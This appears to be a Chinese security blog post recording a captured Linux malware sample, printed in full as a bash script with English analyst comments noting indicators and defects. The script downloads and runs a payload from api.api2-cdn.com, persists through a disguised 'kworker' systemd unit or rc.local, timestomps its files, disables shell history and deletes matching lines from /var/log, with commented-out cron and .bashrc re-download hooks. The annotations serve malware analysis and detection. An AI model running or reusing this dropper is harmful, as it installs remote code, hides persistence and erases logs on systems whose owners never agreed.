自动化计划任务及服务权限维持样本

前言：项目中抓到了一个样本，这里做一个简单的记录

# Captured sample (recorded as-is): a Linux downloader with persistence and anti-forensics.
# Analyst annotations only — the commands below are exactly what was captured.
# Structure: the outer test picks an "el6" (RHEL/CentOS 6, rc.local) branch or a
# systemd-style branch; inside each, `sudo -n id` picks an unprivileged or a sudo path.
# Network indicator: plaintext HTTP fetch from api.api2-cdn.com, path /kworkerps3q.
# File indicators: /var/tmp/kworker, /lib/ntpd, /lib/systemd/system/kworker.service, and the
# kworker / .kworker / xfsalloc / .xfsalloc names under /tmp, /var/tmp, /dev/shm and /usr/bin.
# Host fingerprint: "el6" anywhere in `uname -a` output.
os=`uname -a | grep el6`
# Empty $os means the kernel string did not contain "el6" -> non-el6 (systemd) branch.
if [[ $os = '' ]]
then
    # Probe for passwordless sudo; -n never prompts, so $id stays empty when sudo needs a password.
    id=`sudo -n id` 
    if [[ $id = '' ]]
    then
        # --- unprivileged path (no passwordless sudo) ---
        # Clear immutable (-i) and append-only (-a) flags on any prior copies so rm can remove them;
        # -f silences errors for paths that do not exist. The same path list is reused for rm.
        chattr -f -i /tmp/kworker /tmp/.kworker /var/tmp/kworker /var/tmp/.kworker /dev/shm/kworker /dev/shm/.kworker /usr/bin/.kworker /usr/bin/kworker /tmp/xfsalloc /tmp/.xfsalloc /var/tmp/xfsalloc /var/tmp/.xfsalloc /dev/shm/xfsalloc /dev/shm/.xfsalloc /usr/bin/.xfsalloc /usr/bin/xfsalloc
        chattr -f -a /tmp/kworker /tmp/.kworker /var/tmp/kworker /var/tmp/.kworker /dev/shm/kworker /dev/shm/.kworker /usr/bin/.kworker /usr/bin/kworker /tmp/xfsalloc /tmp/.xfsalloc /var/tmp/xfsalloc /var/tmp/.xfsalloc /dev/shm/xfsalloc /dev/shm/.xfsalloc /usr/bin/.xfsalloc /usr/bin/xfsalloc
        rm -rf /tmp/kworker /tmp/.kworker /var/tmp/kworker /var/tmp/.kworker /dev/shm/kworker /dev/shm/.kworker /usr/bin/.kworker /usr/bin/kworker /tmp/xfsalloc /tmp/.xfsalloc /var/tmp/xfsalloc /var/tmp/.xfsalloc /dev/shm/xfsalloc /dev/shm/.xfsalloc /usr/bin/.xfsalloc /usr/bin/xfsalloc
        # Fetch the payload over plain HTTP with wget (-q quiet), falling back to curl (-s silent).
        # Neither result is checked; a failed download still leads to chmod/exec below.
        wget -qO /var/tmp/kworker http://api.api2-cdn.com/kworkerps3q || curl -so /var/tmp/kworker http://api.api2-cdn.com/kworkerps3q
        chmod +x /var/tmp/kworker
		# Timestomping: copy ls's timestamps (-r) onto the dropped files, locating ls via `which`
		# and falling back to `whereis`. Unprivileged touch on root-owned /lib/ntpd fails in both
		# alternatives; the failure is ignored.
		(touch -r $(which ls) /lib/ntpd)|| (touch -r $(whereis ls | awk '{print $2}') /lib/ntpd)
		(touch -r $(which ls) /var/tmp/kworker)|| (touch -r $(whereis ls | awk '{print $2}') /var/tmp/kworker)
        # Run the payload in the foreground.
        /var/tmp/kworker
        # Strip lines mentioning "kworker" from .bashrc. NOTE: `cat .bashrc` is relative to the
        # current directory while the write goes to ~/.bashrc, so when cwd is not $HOME this
        # truncates ~/.bashrc to a single empty line — a recognisable artifact on affected hosts.
        bashrc=`cat .bashrc | grep -v kworker`;echo "${bashrc}" > ~/.bashrc
        # Disabled in this sample: a .bashrc hook that would re-download and restart the payload.
        #echo "atd=\`ps -ef | grep atd | grep -v grep | grep -v f | awk '{print \$2}'\`;kworker=\`ps -ef | grep shm/kworker | grep -v grep | awk '{print \$2}'\`;if [[ \$atd = '' ]] && [[ \$kworker = '' ]];then rm -rf /var/tmp/kworker;wget -qO /var/tmp/kworker http://api.api2-cdn.com/kworkerps3q || curl -so /var/tmp/kworker http://api.api2-cdn.com/kworkerps3q;chmod +x /var/tmp/kworker;/var/tmp/kworker;fi" >> ~/.bashrc
        # Replace the user's crontab with a copy minus every line containing "kworker"
        # (with no existing crontab, an empty one is installed).
        crontab -l | grep -v "kworker" | crontab
        # Disabled in this sample: a per-minute cron entry carrying the same re-download logic.
        #(crontab -l;echo "* * * * * bash -c \"atd=\\\`ps -ef | grep atd | grep -v grep | grep -v f | awk '{print \\\$2}'\\\`;kworker=\\\`ps -ef | grep shm/kworker | grep -v grep | awk '{print \\\$2}'\\\`;if [[ \\\$atd = '' ]] && [[ \\\$kworker = '' ]];then rm -rf /var/tmp/kworker;wget -qO /var/tmp/kworker http://api.api2-cdn.com/kworkerps3q || curl -so /var/tmp/kworker http://api.api2-cdn.com/kworkerps3q;chmod +x /var/tmp/kworker;/var/tmp/kworker;fi\"") | crontab
        # Anti-forensics: disable shell history for this session only (environment, not files).
        unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG; export HISTFILE=/dev/null; export HISTSIZE=0; export HISTFILESIZE=0
		# Log tampering: delete lines matching "kworker" from every path under /var/log.
		# There is no -type f filter, so directories and binary logs are handed to sed too;
		# all errors are hidden. Unprivileged, this only succeeds on user-writable log files.
		find /var/log/ 2>/dev/null | xargs -i sed -i "/kworker/d" {} 2>/dev/null
    else
        # --- passwordless-sudo path ---
        # Same flag clearing and removal as above, now also covering /lib/ntpd.
        sudo chattr -f -i /lib/ntpd /tmp/kworker /tmp/.kworker /var/tmp/kworker /var/tmp/.kworker /dev/shm/kworker /dev/shm/.kworker /usr/bin/.kworker /usr/bin/kworker /tmp/xfsalloc /tmp/.xfsalloc /var/tmp/xfsalloc /var/tmp/.xfsalloc /dev/shm/xfsalloc /dev/shm/.xfsalloc /usr/bin/.xfsalloc /usr/bin/xfsalloc
        sudo chattr -f -a /lib/ntpd /tmp/kworker /tmp/.kworker /var/tmp/kworker /var/tmp/.kworker /dev/shm/kworker /dev/shm/.kworker /usr/bin/.kworker /usr/bin/kworker /tmp/xfsalloc /tmp/.xfsalloc /var/tmp/xfsalloc /var/tmp/.xfsalloc /dev/shm/xfsalloc /dev/shm/.xfsalloc /usr/bin/.xfsalloc /usr/bin/xfsalloc
        # /lib already exists on any Linux host, so this mkdir fails harmlessly.
        sudo mkdir /lib/
        sudo rm -rf /lib/ntpd /tmp/kworker /tmp/.kworker /var/tmp/kworker /var/tmp/.kworker /dev/shm/kworker /dev/shm/.kworker /usr/bin/.kworker /usr/bin/kworker /tmp/xfsalloc /tmp/.xfsalloc /var/tmp/xfsalloc /var/tmp/.xfsalloc /dev/shm/xfsalloc /dev/shm/.xfsalloc /usr/bin/.xfsalloc /usr/bin/xfsalloc
        # Payload is installed as /lib/ntpd — a path that resembles the NTP daemon's name.
        sudo wget -qO /lib/ntpd http://api.api2-cdn.com/kworkerps3q || sudo curl -so /lib/ntpd http://api.api2-cdn.com/kworkerps3q
        sudo chmod +x /lib/ntpd
        # Remove any earlier "kworker" unit before writing a fresh one.
        sudo systemctl -q disable kworker
        sudo rm -rf /lib/systemd/system/kworker.service
        sudo systemctl daemon-reload
        sudo systemctl reset-failed
        sudo systemctl daemon-reload
        # Persistence: a unit named like a kernel worker thread ("kworker") that runs /lib/ntpd
        # and restarts it whenever it exits (Restart=always). The unit file and the enable
        # symlink under multi-user.target.wants are durable detection artifacts.
        sudo bash -c 'cat << EOF > /lib/systemd/system/kworker.service

[Unit]
After=network.target
[Service]
Type=forking
ExecStart=/lib/ntpd
Restart=always
[Install]
WantedBy=multi-user.target
EOF'
        sudo systemctl daemon-reload
        sudo systemctl reset-failed
        sudo systemctl -q enable kworker
        sudo systemctl start kworker
        # /lib/ntpd is additionally launched directly, outside the unit.
        sudo /lib/ntpd
		# Timestomping without sudo: for a non-root user this fails on root-owned /lib/ntpd.
		# The second line creates an empty /var/tmp/kworker (removed above) carrying ls's
		# timestamps — an empty, timestomped file is itself an artifact worth looking for.
		(touch -r $(which ls) /lib/ntpd)|| (touch -r $(whereis ls | awk '{print $2}') /lib/ntpd)
		(touch -r $(which ls) /var/tmp/kworker)|| (touch -r $(whereis ls | awk '{print $2}') /var/tmp/kworker)
        # `unset` is a shell builtin, so `sudo unset ...` cannot execute and fails; only the
        # exports after the first `;` take effect, and only for this shell session.
        sudo unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG; export HISTFILE=/dev/null; export HISTSIZE=0; export HISTFILESIZE=0
		# Log tampering as root: strip kworker/ntpd/xfsalloc lines from everything under /var/log.
		# The "/ntpd/d" pass also deletes legitimate NTP log lines, and sed -i on binary logs
		# (no -type f filter) can corrupt them — both are tampering tells for responders.
		sudo bash -c 'find /var/log/ 2>/dev/null | xargs -i sed -i "/kworker/d" {} 2>/dev/null'
        sudo bash -c 'find /var/log/ 2>/dev/null | xargs -i sed -i "/ntpd/d" {} 2>/dev/null'
        sudo bash -c 'find /var/log/ 2>/dev/null | xargs -i sed -i "/xfsalloc/d" {} 2>/dev/null'

    fi
else 
    # --- el6 branch (no systemd): same flow, persistence goes through /etc/rc.d/rc.local ---
    id=`sudo -n id`
    if [[ $id = '' ]]
    then
        # Unprivileged path: identical to the non-el6 unprivileged path above.
        chattr -f -i /tmp/kworker /tmp/.kworker /var/tmp/kworker /var/tmp/.kworker /dev/shm/kworker /dev/shm/.kworker /usr/bin/.kworker /usr/bin/kworker /tmp/xfsalloc /tmp/.xfsalloc /var/tmp/xfsalloc /var/tmp/.xfsalloc /dev/shm/xfsalloc /dev/shm/.xfsalloc /usr/bin/.xfsalloc /usr/bin/xfsalloc
        chattr -f -a /tmp/kworker /tmp/.kworker /var/tmp/kworker /var/tmp/.kworker /dev/shm/kworker /dev/shm/.kworker /usr/bin/.kworker /usr/bin/kworker /tmp/xfsalloc /tmp/.xfsalloc /var/tmp/xfsalloc /var/tmp/.xfsalloc /dev/shm/xfsalloc /dev/shm/.xfsalloc /usr/bin/.xfsalloc /usr/bin/xfsalloc
        rm -rf /tmp/kworker /tmp/.kworker /var/tmp/kworker /var/tmp/.kworker /dev/shm/kworker /dev/shm/.kworker /usr/bin/.kworker /usr/bin/kworker /tmp/xfsalloc /tmp/.xfsalloc /var/tmp/xfsalloc /var/tmp/.xfsalloc /dev/shm/xfsalloc /dev/shm/.xfsalloc /usr/bin/.xfsalloc /usr/bin/xfsalloc
        # Plain-HTTP fetch, wget then curl fallback, result unchecked.
        wget -qO /var/tmp/kworker http://api.api2-cdn.com/kworkerps3q || curl -so /var/tmp/kworker http://api.api2-cdn.com/kworkerps3q
        chmod +x /var/tmp/kworker
		# Timestomping with ls's timestamps; the /lib/ntpd attempt fails unprivileged.
		(touch -r $(which ls) /lib/ntpd)|| (touch -r $(whereis ls | awk '{print $2}') /lib/ntpd)
		(touch -r $(which ls) /var/tmp/kworker)|| (touch -r $(whereis ls | awk '{print $2}') /var/tmp/kworker)
        /var/tmp/kworker
        # Same relative-path defect as above: reads ./.bashrc, writes ~/.bashrc.
        bashrc=`cat .bashrc | grep -v kworker`;echo "${bashrc}" > ~/.bashrc
        # Disabled in this sample: .bashrc re-download hook.
        #echo "atd=\`ps -ef | grep atd | grep -v grep | grep -v f | awk '{print \$2}'\`;kworker=\`ps -ef | grep shm/kworker | grep -v grep | awk '{print \$2}'\`;if [[ \$atd = '' ]] && [[ \$kworker = '' ]];then rm -rf /var/tmp/kworker;wget -qO /var/tmp/kworker http://api.api2-cdn.com/kworkerps3q || curl -so /var/tmp/kworker http://api.api2-cdn.com/kworkerps3q;chmod +x /var/tmp/kworker;/var/tmp/kworker;fi" >> ~/.bashrc
        # Rewrite the user crontab without "kworker" lines.
        crontab -l | grep -v "kworker" | crontab
        # Disabled in this sample: per-minute cron re-download entry.
        #(crontab -l;echo "* * * * * bash -c \"atd=\\\`ps -ef | grep atd | grep -v grep | grep -v f | awk '{print \\\$2}'\\\`;kworker=\\\`ps -ef | grep shm/kworker | grep -v grep | awk '{print \\\$2}'\\\`;if [[ \\\$atd = '' ]] && [[ \\\$kworker = '' ]];then rm -rf /var/tmp/kworker;wget -qO /var/tmp/kworker http://api.api2-cdn.com/kworkerps3q || curl -so /var/tmp/kworker http://api.api2-cdn.com/kworkerps3q;chmod +x /var/tmp/kworker;/var/tmp/kworker;fi\"") | crontab
        # Session-only history suppression.
        unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG; export HISTFILE=/dev/null; export HISTSIZE=0; export HISTFILESIZE=0
		# Log tampering (unprivileged): only user-writable files under /var/log are affected.
		find /var/log/ 2>/dev/null | xargs -i sed -i "/kworker/d" {} 2>/dev/null
    else
        # --- el6 passwordless-sudo path ---
        sudo chattr -f -i /lib/ntpd /tmp/kworker /tmp/.kworker /var/tmp/kworker /var/tmp/.kworker /dev/shm/kworker /dev/shm/.kworker /usr/bin/.kworker /usr/bin/kworker /tmp/xfsalloc /tmp/.xfsalloc /var/tmp/xfsalloc /var/tmp/.xfsalloc /dev/shm/xfsalloc /dev/shm/.xfsalloc /usr/bin/.xfsalloc /usr/bin/xfsalloc
        sudo chattr -f -a /lib/ntpd /tmp/kworker /tmp/.kworker /var/tmp/kworker /var/tmp/.kworker /dev/shm/kworker /dev/shm/.kworker /usr/bin/.kworker /usr/bin/kworker /tmp/xfsalloc /tmp/.xfsalloc /var/tmp/xfsalloc /var/tmp/.xfsalloc /dev/shm/xfsalloc /dev/shm/.xfsalloc /usr/bin/.xfsalloc /usr/bin/xfsalloc
        sudo rm -rf /lib/ntpd /tmp/kworker /tmp/.kworker /var/tmp/kworker /var/tmp/.kworker /dev/shm/kworker /dev/shm/.kworker /usr/bin/.kworker /usr/bin/kworker /tmp/xfsalloc /tmp/.xfsalloc /var/tmp/xfsalloc /var/tmp/.xfsalloc /dev/shm/xfsalloc /dev/shm/.xfsalloc /usr/bin/.xfsalloc /usr/bin/xfsalloc
        # Payload installed as /lib/ntpd, same plain-HTTP source.
        sudo wget -qO /lib/ntpd http://api.api2-cdn.com/kworkerps3q || sudo curl -so /lib/ntpd http://api.api2-cdn.com/kworkerps3q
        sudo chmod +x /lib/ntpd
		# Timestomping without sudo (see non-el6 sudo path): /lib/ntpd attempt fails for
		# non-root users; the second line recreates /var/tmp/kworker as an empty file.
		(touch -r $(which ls) /lib/ntpd)|| (touch -r $(whereis ls | awk '{print $2}') /lib/ntpd)
		(touch -r $(which ls) /var/tmp/kworker)|| (touch -r $(whereis ls | awk '{print $2}') /var/tmp/kworker)
        sudo /lib/ntpd
        # Persistence via rc.local: after shell unescaping the sed scripts are
        # s/\/usr\/bin\/kworker//g and s/\/lib\/ntpd//g, i.e. delete earlier occurrences of
        # those strings in place, then append a fresh "/lib/ntpd" line.
        sudo sed -i s/\\/usr\\/bin\\/kworker//g /etc/rc.d/rc.local
        sudo sed -i s/\\/lib\\/ntpd//g /etc/rc.d/rc.local
        echo "echo '/lib/ntpd' >> /etc/rc.d/rc.local" | sudo sh
        # rc.local is made executable so it runs at boot; a modified, executable rc.local
        # containing /lib/ntpd is the el6 detection artifact.
        sudo chmod +x /etc/rc.d/rc.local
        # `sudo unset` fails (builtin); only the exports apply, for this session.
        sudo unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG; export HISTFILE=/dev/null; export HISTSIZE=0; export HISTFILESIZE=0
		# Log tampering as root, including deletion of legitimate "ntpd" log lines.
		sudo bash -c 'find /var/log/ 2>/dev/null | xargs -i sed -i "/kworker/d" {} 2>/dev/null'
        sudo bash -c 'find /var/log/ 2>/dev/null | xargs -i sed -i "/ntpd/d" {} 2>/dev/null'
        sudo bash -c 'find /var/log/ 2>/dev/null | xargs -i sed -i "/xfsalloc/d" {} 2>/dev/null'
    fi
fi